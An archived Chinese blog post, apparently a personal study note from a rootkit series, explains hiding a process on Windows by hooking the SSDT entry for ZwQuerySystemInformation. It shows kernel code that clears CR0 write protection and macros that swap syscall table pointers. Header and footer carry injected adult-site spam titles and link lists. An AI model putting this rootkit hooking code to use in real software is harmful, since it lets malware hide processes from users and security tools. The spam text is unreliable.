青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

S.l.e!ep.¢%

像打了激速一樣,以四倍的速度運轉,開心的工作
簡單、開放、平等的公司文化;尊重個性、自由與個人價值;
posts - 1098, comments - 335, trackbacks - 0, articles - 1
  C++博客 :: 首頁 :: 新隨筆 :: 聯系 :: 聚合  :: 管理

HOOK SSDT Hide Process (三)

Posted on 2009-10-25 16:06 S.l.e!ep.¢% 閱讀(496) 評論(0)  編輯 收藏 引用 所屬分類: RootKit
前:HOOK SSDT Hide Process (二)

[新資料] SSDT HIDE Process
[舊資料] HOOK SSDT實現進程隱藏

舊資料中的 Hook 是如此實現的

  1. VOID Hook()
  2. {
  3. ? ? ? ? DbgPrint("Entry Hook()\n");
  4. ? ? ? ? OldAddress =(ULONG)KeServiceDescriptorTable->ServiceTableBase + 4*0xAd;//用windbg反匯編查到zwquerysysteminformationde
  5. ???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????//的ID號是0xADh
  6. ? ? ? ? DbgPrint("KeServiceDescriptorTable->ServiceTableBase is :0x%0x\n",KeServiceDescriptorTable->ServiceTableBase);
  7. ? ? ? ? //保存原來函數的地址
  8. ? ? ? ? OldZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION) *(ULONG *)OldAddress;
  9. ??DbgPrint("OldZwQuerySystemInformation is :0x%0x\n", OldZwQuerySystemInformation);
  10. ??DbgPrint("MyZwQuerySystemInformation is :0x%0x\n", MyZwQuerySystemInformation);
  11. ? ?//取消內存寫保護
  12. ??_asm
  13. ??{
  14. ? ? cli
  15. ???
  16. ? ?? ?mov??eax,cr0??
  17. ? ?? ?and??eax,not 10000h
  18. ? ?? ?mov??cr0,eax
  19. ??????
  20. ??}
  21. ???
  22. ? ? ? ? *(ULONG*)OldAddress =(ULONG) MyZwQuerySystemInformation;? ?? ? //mark? ?MyZwQuerySystemInformation;
  23. ??
  24. ??//還原內存寫保護
  25. ??_asm
  26. ??{??
  27. ??
  28. ? ? mov??eax,cr0
  29. ? ?? ?or? ?eax,10000h
  30. ? ?? ?mov??cr0,eax
  31. ? ?? ?sti
  32. ??
  33. ??
  34. ??}
  35. }

OldAddress =(ULONG)KeServiceDescriptorTable->ServiceTableBase + 4*0xAd;
//用windbg反匯編查到zwquerysysteminformationde的ID號是0xADh
1. zwquerysysteminformationde的ID號是0xADh?? 這個ID是如何得來的?
A: 用 Windbg? u 顯示 zwquerysysteminformation 所在地址都可以看到, 見Q3

Q2. 4表示指針的大小?如果在 64機器上就應該是 8 了?
A:?? 是的,所以正規寫法應該是
#define SYSTEMSERVICE(_function)? KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)_function+1)]

Q3. 另一種寫法是
#define SYSTEMSERVICE(_function)? KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)_function+1)]
// save old system call locations
OldZwQuerySystemInformation =(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation));

*(PULONG) 是地址的偏移類型, 相關于 *4, 但 PUCHAR 又是什么? _function+1 又表示什么?
"將_Function+1即可確定ServiceID的位置,即在系統服務調度表中的入口地址"

A:四個有用的宏
SYSTEMSERVICE macro:可以獲得由ntoskrnl.exe導出函數,以Zw*開頭函數的地址,這個函數的返回值就是Nt*函數,Nt*函數的地址就在SSDT中
SYSCALL_INDEX macro:獲得Zw*函數的地址并返回與之通信的函數在SSDT中的索引。
這兩個宏之所以能工作,是因為所有的Zw*函數都開始于opcode:MOV eax, ULONG,這里的ULONG就是系統調用函數在SSDT中的索引。
例:
00401023????? A1 94214000??????? mov???? eax, dword ptr [402194]
A1 表示?? ?mov eax
94214000 表示ULONG
所有 Zw* 開頭的函數最開始的第一條指令是? MOV eax, ULONG, 這里的ULONG就是系統調用函數在SSDT中的索引。
_function 是函數地址, (PUCHAR)_function+1?? 指向 ULONG, 再把它轉成 PULONG? ,就可以拿到 系統調用函數在SSDT中的索引 (Nt*函數的地址)


HOOK_SYSCALL和UNHOOK_SYSCALL macros:獲得Zw*函數的地址,取得他的索引,自動的交換SSDT中索引所對應的函數地址和我們hook函數的地址。
這四個宏具體是:
#define SYSTEMSERVICE(_func)?KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)_func+1)]
??
#define SYSCALL_INDEX(_Function) *(PULONG)((PUCHAR)_Function+1)
??
#define HOOK_SYSCALL(_Function, _Hook, _Orig )??\
_Orig = (PVOID) InterlockedExchange( (PLONG)???\
&MappedSystemCallTable[SYSCALL_INDEX(_Function)], (LONG) _Hook)
??
#define UNHOOK_SYSCALL(_Func, _Hook, _Orig )??\
InterlockedExchange((PLONG)?\
&MappedSystemCallTable[SYSCALL_INDEX(_Func)], (LONG) _Hook)

Hook SSDT 其實就是把 SSDT 里面的函數地址替換成自己的處理函數, 一般在 DriverEntry() 就HOOK了
在 DriverUnload() 里再把 SSDT 里面的函數地址還原?

在寫 KeServiceDescriptorTable.ServiceTableBase? 時有一個重要步驟
需要去掉'內存保護'才可以寫入
Q:為何這個變量會受到'內存保護'?? 受'內存保護'的意義是?既然有辦法去掉'內存保護',那為何還要保護呢?

目前所知,去掉'內存保護'有兩種方法
1. 設置 CR0 寄存器的標志位
2. MDL

Q1: 這兩種方法的區別是什么?
Q2: MDL 的原理又是什么?

青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品
  • <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            午夜精品视频在线观看一区二区 | 国产精品久久九九| 久久av一区| 亚洲专区国产精品| 午夜伦理片一区| 欧美在线免费看| 麻豆精品在线视频| 欧美精品一区二区蜜臀亚洲 | 免费观看成人www动漫视频| 久久久久99精品国产片| 麻豆成人精品| 欧美日韩在线播放三区| 国产精品一区二区a| 在线观看日韩国产| 99精品欧美一区| 亚洲综合好骚| 巨胸喷奶水www久久久免费动漫| 久久综合久久综合久久综合| 亚洲国产精品精华液2区45| 欧美精品一区二区在线播放| 欧美视频一区二区三区| 国产一区二区三区在线观看精品| 亚洲国产成人一区| 亚洲欧美日韩天堂| 麻豆九一精品爱看视频在线观看免费| 亚洲高清色综合| 亚洲欧美国产精品专区久久| 毛片一区二区| 国产精品一区在线播放| 亚洲欧洲一区二区三区| 欧美永久精品| 99国产麻豆精品| 免费日韩成人| 国产欧亚日韩视频| 99视频在线观看一区三区| 久久国产66| 亚洲精品免费观看| 久久综合999| 国产日韩欧美高清| 99av国产精品欲麻豆| 久久综合导航| 欧美一区二区视频在线观看2020| 欧美激情一区在线观看| 在线精品观看| 久久综合九色综合久99| 午夜精品一区二区三区四区| 欧美日韩日韩| avtt综合网| 91久久久久久久久久久久久| 久久精品九九| 国内揄拍国内精品久久| 欧美一级午夜免费电影| 99国产精品99久久久久久粉嫩| 麻豆视频一区二区| 在线观看日韩av先锋影音电影院| 久久国产精品黑丝| 亚洲欧美在线x视频| 国产精品一区在线播放| 午夜精品免费视频| 亚洲图片你懂的| 国产精品分类| 午夜天堂精品久久久久| 99视频精品全国免费| 欧美日本精品| 亚洲午夜高清视频| 亚洲午夜91| 国产视频精品va久久久久久| 久久精品人人做人人爽| 欧美一区三区三区高中清蜜桃| 国产日韩欧美不卡| 久久夜精品va视频免费观看| 久久精品色图| 亚洲国产欧洲综合997久久| 亚洲成人在线视频网站| 欧美激情综合五月色丁香小说| 亚洲毛片视频| 一区二区三区你懂的| 国产精品区一区二区三区| 在线看片欧美| 亚洲国产精品t66y| 欧美理论电影在线播放| 亚洲一区3d动漫同人无遮挡| 亚洲欧美日韩中文在线制服| 国产欧美一区二区三区另类精品| 欧美在线日韩| 免费亚洲电影在线观看| 99av国产精品欲麻豆| 亚洲你懂的在线视频| 韩国欧美国产1区| 亚洲高清视频在线| 国产精品女人久久久久久| 久久精品亚洲国产奇米99| 久热成人在线视频| 亚洲字幕在线观看| 久久久精品免费视频| 亚洲麻豆一区| 羞羞答答国产精品www一本| 在线看一区二区| 一本久道久久综合狠狠爱| 国内综合精品午夜久久资源| 亚洲国产成人精品久久| 国产色产综合色产在线视频| 亚洲国产日韩欧美在线99| 国产精品呻吟| 亚洲欧洲在线一区| 国产伊人精品| 一区二区三区国产盗摄| 1204国产成人精品视频| 亚洲在线一区二区| 亚洲精品视频在线观看免费| 亚洲欧美综合精品久久成人| 亚洲免费观看在线观看| 久久国产视频网| 亚洲欧美日韩国产一区二区| 乱中年女人伦av一区二区| 欧美一区二视频在线免费观看| 欧美大片在线看| 美女在线一区二区| 国产一区日韩欧美| 亚洲综合视频网| 亚洲一区久久久| 欧美激情一区在线| 欧美激情黄色片| 狠狠色狠狠色综合| 午夜精品免费视频| 欧美一级理论性理论a| 国产精品对白刺激久久久| 亚洲免费观看视频| 日韩一级在线| 欧美美女喷水视频| 亚洲精品国产精品国自产观看浪潮| 国内精品久久久久影院色| 午夜精品一区二区三区在线播放| 亚洲专区国产精品| 国产精品毛片a∨一区二区三区| 亚洲精品视频在线| 一本色道久久综合亚洲精品高清| 你懂的一区二区| 欧美黄免费看| 亚洲欧洲在线播放| 欧美激情一二区| 亚洲日本欧美| 亚洲一区在线播放| 国产精品久线观看视频| 亚洲视频一区在线| 一区视频在线看| 久久久久国产成人精品亚洲午夜| 久久国产天堂福利天堂| 国产色产综合产在线视频| 香港久久久电影| 美女日韩在线中文字幕| 亚洲国产一区二区a毛片| 米奇777在线欧美播放| 亚洲国产精品一区二区第四页av| 亚洲毛片在线| 国产精品毛片高清在线完整版| 亚洲欧美日韩国产一区二区| 久久久久久有精品国产| 亚洲国产精品久久| 欧美日韩精品久久| 亚洲女爱视频在线| 蜜臀av一级做a爰片久久| 亚洲精品久久久一区二区三区| 欧美日韩国产亚洲一区| 亚洲欧美福利一区二区| 免费亚洲一区| 亚洲一区二区三区四区中文 | 99国产精品视频免费观看一公开 | 国产精品人人做人人爽| 欧美在线视频播放| 亚洲人成7777| 久久精品一区四区| 夜夜精品视频一区二区| 国产一区二区成人| 欧美激情在线播放| 小黄鸭视频精品导航| 亚洲国产专区校园欧美| 久久成人精品| 99爱精品视频| 一区免费观看| 国产精品亚洲综合| 免费欧美视频| 欧美一区二区在线免费观看 | 久久综合激情| 亚洲在线视频一区| 91久久久久久| 女女同性女同一区二区三区91| 亚洲视频碰碰| 精品白丝av| 国产精品视频网| 欧美日本一区二区视频在线观看| 欧美中日韩免费视频| 中国成人亚色综合网站| 亚洲国产欧美国产综合一区 | 夜夜嗨av色综合久久久综合网| 欧美a级片网站| 欧美中文字幕视频| 亚洲网站视频福利| 日韩一级片网址| 99热在这里有精品免费|